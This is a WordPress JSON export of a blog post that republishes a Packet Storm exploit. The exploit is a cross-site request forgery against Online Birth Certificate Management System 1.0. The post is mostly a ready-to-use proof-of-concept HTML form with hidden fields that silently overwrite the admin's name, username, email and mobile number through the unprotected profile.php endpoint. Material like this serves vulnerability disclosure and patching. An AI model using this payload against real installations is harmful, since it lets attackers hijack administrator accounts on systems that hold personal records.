{"id":31146,"date":"2022-09-27T20:58:34","date_gmt":"2022-09-27T17:58:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168522\/obcms10-xsrf.txt"},"modified":"2022-09-28T15:04:43","modified_gmt":"2022-09-28T11:34:43","slug":"online-birth-certificate-management-system-1-0-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-birth-certificate-management-system-1-0-cross-site-request-forgery\/","title":{"rendered":"Online Birth Certificate Management System 1.0 Cross Site Request Forgery"},"content":{"rendered":"<dl id=\"F168522\" class=\"file first\">\n<dt dir=\"ltr\"><a class=\"ico text-plain\" title=\"Size: 1.1 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/168522\/obcms10-xsrf.txt\" target=\"_blank\" rel=\"noopener\"><strong>Online Birth Certificate Management System 1.0 Cross Site Request Forgery<\/strong><\/a><\/dt>\n<dd class=\"datetime\" dir=\"ltr\">Posted <a title=\"15:44:39 UTC\" href=\"https:\/\/packetstormsecurity.com\/files\/date\/2022-09-27\/\" target=\"_blank\" rel=\"noopener\">Sep 27, 2022<\/a><\/dd>\n<dd class=\"refer\" dir=\"ltr\">Authored by <a class=\"person\" href=\"https:\/\/packetstormsecurity.com\/files\/author\/16435\/\" target=\"_blank\" rel=\"noopener\">Yousef Alraddadi<\/a><\/dd>\n<dd class=\"detail\" dir=\"ltr\">Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.<\/dd>\n<dd class=\"tags\" dir=\"ltr\">tags | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/csrf\" target=\"_blank\" rel=\"noopener\">csrf<\/a><\/dd>\n<dd class=\"md5\" dir=\"ltr\">SHA-256 | <code>f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe<\/code><\/dd>\n<dd class=\"act-links\" dir=\"ltr\"><a title=\"Size: 1.1 KB\" 
href=\"https:\/\/packetstormsecurity.com\/files\/download\/168522\/obcms10-xsrf.txt\" rel=\"nofollow noopener\" target=\"_blank\">Download<\/a> | <a class=\"fav\" href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/168522\/\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/168522\/Online-Birth-Certificate-Management-System-1.0-Cross-Site-Request-Forgery.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\" dir=\"ltr\">\n<pre><code># Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)\r\n# Google Dork: N\/A\r\n# Date: 2022-9-27\r\n# Exploit Author: yousef alraddadi - https:\/\/twitter.com\/y0usef_11\r\n# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15683\/online-birth-certificate-management-system-php-free-download.html\r\n# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/OBCMS.zip\r\n# Tested on: windows 11 - XAMPP\r\n# CVE : N\/A\r\n# Version: 1.0<\/code><\/pre>\n<p># no token in update profile admin<\/p>\n<p>&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;title&gt; CSRF update Profile &lt;\/title&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body&gt;<br \/>\n&lt;form action=&quot;http:\/\/localhost\/OBCMS\/admin\/profile.php&quot; method=&quot;post&quot; enctype=&quot;multipart\/form-data&quot;&gt;<br \/>\n&lt;input type=&quot;hidden&quot; name=&quot;adminname&quot; value=&quot;csrf111&quot;&gt;<br \/>\n&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;csrf&quot;&gt;<br \/>\n&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;csrf&quot;&gt;<br \/>\n&lt;input type=&quot;hidden&quot; name=&quot;mobilenumber&quot; value=&quot;0&quot;&gt;<br \/>\n&lt;button class=&quot;btn btn-sm btn-primary login-submit-cs&quot; type=&quot;submit&quot; name=&quot;submit&quot;&gt;Save 
Change&lt;\/button&gt;<br \/>\n&lt;\/form&gt;<br \/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Online Birth Certificate Management System 1.0 Cross Site Request Forgery Posted Sep 27, 2022 Authored by Yousef Alraddadi Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability. tags | exploit, csrf SHA-256 | f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe Download | Favorite | View # Exploit Title: Online Birth Certificate Management System &#8211; Cross &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31146","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31146"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31146\/revisions"}],"predecessor-version":[{"id":31207,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31146\/revisions\/31207"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31146"},{"taxonomy":"post_tag","emb
eddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}